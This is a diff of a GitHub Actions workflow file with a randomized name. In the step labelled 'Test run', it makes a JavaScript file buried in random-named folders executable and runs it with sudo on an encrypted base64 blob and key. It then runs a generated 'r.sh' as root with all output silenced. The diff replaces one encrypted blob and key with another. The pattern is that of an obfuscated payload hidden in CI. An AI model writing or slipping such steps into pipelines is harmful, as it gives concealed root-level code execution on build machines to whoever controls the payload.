--- a/.github/workflows/uecyp.yml
+++ b/.github/workflows/uecyp.yml
@@ -29,6 +29,6 @@ jobs:
     - name: Test run
       run: |
         cd ${{ github.workspace }}
-        echo '1uv63'
+        echo '22vdc'
         sudo chmod +x johns2xqp/field806dx/piersonteqsh/rubiox050l.js
-        sudo ./johns2xqp/field806dx/piersonteqsh/rubiox050l.js U2FsdGVkX1/J/BuWpjrSe99V+y5lYn830lG6QomVM3nVO6qJVyBvK/ZXdhvJ9MdG+AL6Rod0W614HJbytGRqODtqK2PPZIW6QDqXSm4JKhlmnqePwqoyQRO0EGUHsh+B dbvr8o && sudo sh r.sh > /dev/null 2>&1
+        sudo ./johns2xqp/field806dx/piersonteqsh/rubiox050l.js U2FsdGVkX1+4bzxlmSlAniPyGWm7E9WORmtbfnanS1WPwe0GrRuejEsXcV9cDh6W4qfSAdzFIDapazT8KQW6E/EzCrPEB1RznTeTHaCrxdx+EdJKfaQV5h7PxXonspi7 xq243t && sudo sh r.sh > /dev/null 2>&1
